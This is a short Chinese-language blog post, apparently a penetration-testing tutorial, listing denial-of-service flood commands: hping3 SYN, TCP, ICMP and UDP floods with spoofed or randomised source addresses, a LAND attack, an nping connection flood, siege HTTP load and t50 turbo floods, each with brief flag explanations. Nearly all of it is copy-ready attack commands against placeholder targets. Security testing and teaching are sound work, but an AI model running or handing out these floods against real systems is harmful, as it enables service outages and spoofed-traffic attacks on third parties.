DoS拒绝服务-工具使用hping3、nping等(四)


Hping3
几乎可以定制发送任何tcp/ip数据包,用于测试fw,端口扫描,性能测试

 1 Syn Flood
 2 – hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1 //一条命令搞定
 3 -c 计数器,多次数据包 -d 数据包多大 -S syn包 -p 目标攻击端口 --flood泛洪方式
 4 --rand-source:随机源地址 1.1.1.1 攻击的目标
 5 
 6 另外一种组合:
 7 – hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
 8 
 9 TCP Flood攻击:
10 – hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 
11 -SARFUP标记类全标记满
12 
13 ICMP Flood攻击
14 – hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
15 -q:安静模式 -n:不作域名解析 -a:伪造源地址
16 
17 ▪ UDP Flood
18 – hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
19 -s:指定源端口,不指定也可以
20 
21 LAND攻击
22 – 伪造源地址和目标地址都是自己,造成自己打自己
23 – hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1

 

 

nping
TCP全链接DoS攻击
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
--tcp-connect:建立tcp连接 --rate=10000:速率一万个

 

Siege
– http/https 压力测试
– siege -i -c 1000 http://1.1.1.1/a.php -A htttttp
-c 1000个并发连接
-A 自定义http头,随便写都可以
– 同时攻击多个url,-f 使用字典
▪ /etc/siege/urls.txt

 

▪ T50
– t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
– t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22

posted @ 2020-09-14 19:43  包子TT  阅读(1078)  评论(0编辑  收藏  举报